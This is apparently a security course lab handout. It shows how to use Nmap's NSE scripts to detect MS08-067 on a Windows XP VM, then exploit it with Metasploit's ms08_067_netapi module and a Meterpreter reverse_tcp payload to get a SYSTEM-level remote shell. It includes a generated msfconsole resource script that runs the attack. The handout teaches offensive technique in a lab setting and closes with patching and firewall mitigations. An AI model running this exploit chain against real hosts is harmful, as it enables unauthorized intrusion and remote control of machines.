Lab 5 - Using The Nmap Scripting Engine (NSE) and Metasploit To Exploit Windows XP
1. One VM of Kali
2. One VM of Windows XP SP2 (Lab 2a)
Nmap is one of the few tools that every hacker should be conversant in. Although it is not
perfect, it is excellent for active reconnaissance. Although I discourage the use of Windows for
hacking, Nmap does ship a Windows build, and its GUI front end, Zenmap, runs there as well as on
Linux.
The Nmap Scripting Engine (NSE) is one of Nmap's most powerful and, at the same time, most flexible
features. It lets users write their own scripts in Lua and share them with other users to automate
reconnaissance and other network tasks. These scripts can be used for:
Network discovery
More sophisticated service and version detection
Vulnerability detection
Backdoor (malware) detection
Vulnerability exploitation
In this lab, we will look at the scripts that ship with Nmap and are built into Kali, and how to
use them to do thorough recon on our target to increase the probability of success.
As the screenshot above shows, listing the scripts directory (/usr/share/nmap/scripts on Kali)
displays hundreds of Nmap scripts. Among the most useful to us are the vulnerability scanning
scripts. These are usually designed to find one specific vulnerability, or one type of
vulnerability, that we can come back and exploit later. To locate the scripts we can use for
vulnerability scanning, we can type:
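Nmap keeps a category index for every script alongside the scripts themselves. As an added example (not the lab's own command), the shell function below reads that index, which on Kali is /usr/share/nmap/scripts/script.db, and prints every script tagged with a given category. The index excerpt embedded in the block is constructed so the example runs without Nmap installed.

```sh
#!/bin/sh
# Added example, not part of the lab: list the NSE scripts in a given category by
# reading Nmap's script index. On Kali that index is /usr/share/nmap/scripts/script.db
# and each line has the form
#   Entry { filename = "smb-vuln-ms08-067.nse", categories = { "intrusive", "vuln" } }

# Constructed excerpt of script.db so the example runs without Nmap installed.
SAMPLE_SCRIPT_DB='Entry { filename = "banner.nse", categories = { "discovery", "safe" } }
Entry { filename = "smb-os-discovery.nse", categories = { "default", "discovery", "safe" } }
Entry { filename = "smb-vuln-ms08-067.nse", categories = { "intrusive", "vuln" } }
Entry { filename = "smb-vuln-ms17-010.nse", categories = { "vuln", "safe" } }
Entry { filename = "ftp-vsftpd-backdoor.nse", categories = { "exploit", "intrusive", "malware", "vuln" } }'

# scripts_in_category <category>: reads script.db on stdin and prints the name of
# every script whose category list contains <category> exactly (a prefix such as
# "vul" matches nothing, unlike a plain grep of the file names).
scripts_in_category() {
    awk -v want="$1" '
        match($0, /filename = "[^"]+"/) {
            name = substr($0, RSTART + 12, RLENGTH - 13)   # strip the filename = "..." wrapper
            if (match($0, /categories = [{][^}]*[}]/)) {
                n = split(substr($0, RSTART, RLENGTH), part, "\"")
                for (i = 2; i <= n; i += 2)                 # even-numbered parts are the quoted names
                    if (part[i] == want) { sub(/\.nse$/, "", name); print name; break }
            }
        }
    '
}

echo "Scripts in the vuln category (constructed index):"
printf '%s\n' "$SAMPLE_SCRIPT_DB" | scripts_in_category vuln
```

On Kali, scripts_in_category vuln < /usr/share/nmap/scripts/script.db lists the real set, and nmap --script-help vuln prints each script's description. Categories also combine on the Nmap command line: --script "vuln and safe" runs only the vulnerability checks that are not flagged intrusive.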
1. Ensure the Windows XP virtual machine is up and running. You will need the IP address of
your victim to run this script. Think back to Lab 3: what Nmap commands could you use to
footprint the network and discover the IP of your Windows XP victim? You can also get the IP by
logging on to the victim and running ipconfig from a command prompt.
Try running the SMB vulnerability checking script against your Windows XP victim. Note that the
MS08-067 check is in the intrusive category and can crash the Server service on a vulnerable
host, so only run it against your lab machine.
Now, when I run the command, I get much more useful results.
As you can see, it reports that the host is vulnerable to MS08-067, so now I know I can use the
matching module in Metasploit to exploit that system!
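Before moving on to Metasploit it is worth confirming that the VULNERABLE verdict really came from the MS08-067 check and not from some other script's output. As an added example (not part of the lab), the shell function below reads saved Nmap normal output and succeeds only when the MS08-067 script itself reported VULNERABLE. The three Nmap outputs embedded in it are constructed; 192.168.225.134 is the lab's victim address and the real scan command is shown in a comment rather than executed.

```sh
#!/bin/sh
# Added example, not part of the lab: decide from saved Nmap output whether the
# MS08-067 check actually reported VULNERABLE before moving on to Metasploit.
# The real scan (not executed here; 192.168.225.134 is the lab's victim, yours differs):
#   nmap -p445 --script smb-vuln-ms08-067 -oN ms08-067.nmap 192.168.225.134
# Caution: this check is in the intrusive category and can crash the Server
# service on a vulnerable host, so only run it against your lab VM.

# Constructed output in the format of current Nmap's smb-vuln-ms08-067 script.
SAMPLE_VULNERABLE='Nmap scan report for 192.168.225.134
Host is up (0.00042s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|     Disclosure date: 2008-10-23
|     References:
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250'

# Constructed output from older Nmap releases, where the check lived in smb-check-vulns.
SAMPLE_OLD_FORMAT='Host script results:
| smb-check-vulns:
|   MS08-067: VULNERABLE
|   Conficker: Likely CLEAN
|_  MS06-025: NO SERVICE (the Ras RPC service is inactive)'

# Constructed output where the check found nothing: the vulns library prints no
# block at all unless --script-args vulns.showall is given, so only another
# script's result appears. Lines from other scripts must not count as a finding.
SAMPLE_NOT_CONFIRMED='Host script results:
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|_  Computer name: xp-victim'

# ms08_067_state: read Nmap normal output on stdin, print VULNERABLE and succeed
# only if the MS08-067 check itself reported it; otherwise print NOT CONFIRMED.
ms08_067_state() {
    awk '
        # "| <script>:" opens a script result block; remember which script we are in
        /^[|] [A-Za-z0-9_-]+: *$/ { script = $2; sub(/:$/, "", script); next }
        script == "smb-vuln-ms08-067" && /State: VULNERABLE/    { confirmed = 1 }
        script == "smb-check-vulns"   && /MS08-067: VULNERABLE/ { confirmed = 1 }
        END {
            if (confirmed) { print "VULNERABLE"; exit 0 }
            print "NOT CONFIRMED"; exit 1
        }
    '
}

for sample in "$SAMPLE_VULNERABLE" "$SAMPLE_OLD_FORMAT" "$SAMPLE_NOT_CONFIRMED"; do
    if printf '%s\n' "$sample" | ms08_067_state >/dev/null; then
        echo "MS08-067 confirmed: proceed to exploit/windows/smb/ms08_067_netapi"
    else
        echo "MS08-067 not confirmed: re-check the scan before exploiting"
    fi
done
```

With a real scan saved via -oN, ms08_067_state < ms08-067.nmap gates the next step; adding --script-args vulns.showall to the scan makes Nmap print NOT VULNERABLE explicitly instead of staying silent.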
We need to know the difference between an exploit and a payload. The vulnerability is the flaw in
the system; the exploit is the code that takes advantage of it. In the case of MS08-067, the flaw
is in the Windows Server service and is reached over SMB. When we search for modules within
Metasploit, we are looking for exploits. From the Metasploit command line, we can find a specific
exploit with the search command, for example "search ms08", or whatever exploit you want.
A payload is the code we deliver to the victim once the exploit succeeds. Not every payload works
with every exploit; "show payloads" inside a selected module lists the compatible ones.
Stop! The address in the screenshot is my IP address, not yours! Your Windows XP IP address will
differ.
Again, RHOST is the remote host, the machine we are attacking. To set it, I'll enter
"set RHOST 192.168.225.134" at the exploit prompt. (Current Metasploit versions list this option
as RHOSTS.)
You also need to set LHOST, the local host IP address, which is where the payload will connect
back to. If you don't know the IP address of your Kali machine, type ifconfig (or ip addr on
newer Kali) at the exploit prompt; msfconsole passes commands it does not recognise to the system
shell.
We want to take over the machine and have our way with it, and nothing says hackfest like a
remote shell connection with a victim. To get this remote shell, we will use one of the most
popular payloads found in Metasploit, called Meterpreter.
Meterpreter is a very powerful in-memory payload with plenty of options, but the most popular is
the ability to establish a remote shell with the victim.
We prefer the remote shell because it gives us the run of the remote machine as if we were
physically sitting at the keyboard. Because MS08-067 is a flaw in the Server service, the shell
runs as NT AUTHORITY\SYSTEM, the highest privilege level on the box.
All that is left to do is launch the exploit, carrying the payload, at the victim. To do this, we
use the exploit command.
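The search, use, set RHOST, set LHOST, payload selection and exploit steps above can be captured as a Metasploit resource script so the whole sequence is reviewed before anything is launched. The shell block below is an added example, not part of the lab: it generates that resource script, refuses bad or identical attacker/victim addresses (the "this is my IP, not yours" mistake the lab warns about), and shows how to hand it to msfconsole. It assumes a current Metasploit (which names the target option RHOSTS), an attacker interface named eth0 and listener port 4444; 192.168.225.134 is the lab's victim address and 192.168.225.130 is a placeholder attacker address.

```sh
#!/bin/sh
# Added example, not part of the lab: generate (and optionally run) the lab's
# msfconsole commands as a resource script, with the RHOST/LHOST values checked
# first. Assumptions: Metasploit 5 or newer (option name RHOSTS), attacker
# interface eth0, listener port 4444. Victim 192.168.225.134 is the lab's address;
# 192.168.225.130 below is a placeholder for your Kali address.

# is_ipv4 <string>: succeeds only for a dotted quad whose octets are 0-255.
is_ipv4() {
    printf '%s\n' "$1" | awk -F. '
        NF != 4 { exit 1 }
        { for (i = 1; i <= 4; i++) if ($i !~ /^[0-9]+$/ || $i > 255) exit 1 }
    '
}

# lhost_for <interface>: the address the lab has you read off ifconfig.
lhost_for() {
    ip -4 -o addr show dev "$1" | awk '{ print $4 }' | cut -d/ -f1
}

# ms08_067_rc <rhost> <lhost> [lport]: print the resource script, or fail when the
# addresses are malformed or identical (attacking your own Kali box by mistake).
ms08_067_rc() {
    rhost=$1 lhost=$2 lport=${3:-4444}
    if ! is_ipv4 "$rhost" || ! is_ipv4 "$lhost"; then
        echo "ms08_067_rc: RHOST and LHOST must be IPv4 addresses" >&2
        return 1
    fi
    if [ "$rhost" = "$lhost" ]; then
        echo "ms08_067_rc: RHOST and LHOST are the same address" >&2
        return 1
    fi
    # "check" asks the module whether the target looks vulnerable before "exploit" fires.
    cat <<EOF
use exploit/windows/smb/ms08_067_netapi
set RHOSTS $rhost
set LHOST $lhost
set LPORT $lport
set PAYLOAD windows/meterpreter/reverse_tcp
check
exploit
EOF
}

# run_lab <rhost> [interface]: write the script and start msfconsole with it.
# Not called here; on Kali: run_lab 192.168.225.134
run_lab() {
    rhost=$1
    lhost=$(lhost_for "${2:-eth0}")
    ms08_067_rc "$rhost" "$lhost" > ms08-067.rc || return 1
    msfconsole -q -r ms08-067.rc
}

# Demonstration with the lab's victim address and the placeholder attacker address.
ms08_067_rc 192.168.225.134 192.168.225.130
```

If the module's check step reports the target as not vulnerable, stop and go back to the Nmap result rather than letting exploit run against a host that will not yield a session.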
Success! We now have a Meterpreter session on our victim. Earlier in the lab, we ran the
ipconfig command on our Windows XP victim; to do so, we had to access the machine physically. We
can now bring up a command prompt and run ipconfig through the remote shell instead.
At the meterpreter prompt, type shell. The prompt changes to the command prompt of the victim
machine. Type ipconfig; when you are done, type exit to return to the meterpreter prompt.
Summary
This lab picked up where the previous Nmap lab left off. Once we had identified the victim and
determined that it was running Windows XP, we checked it for the MS08-067 vulnerability. Once we
confirmed the vulnerability existed, we searched for an exploit for MS08-067 inside Metasploit.
We then launched the exploit with the Meterpreter payload and established a remote shell to the
victim.
Patching Windows XP (Microsoft fixed MS08-067 in October 2008) or a host firewall blocking TCP
port 445 would have prevented this exploit from running. An up-to-date virus scanner may catch
the default Meterpreter payload, but it does not remove the vulnerability and should not be relied
on; Windows XP itself has been unsupported since April 2014, so the real fix is to retire it.
End of Lab!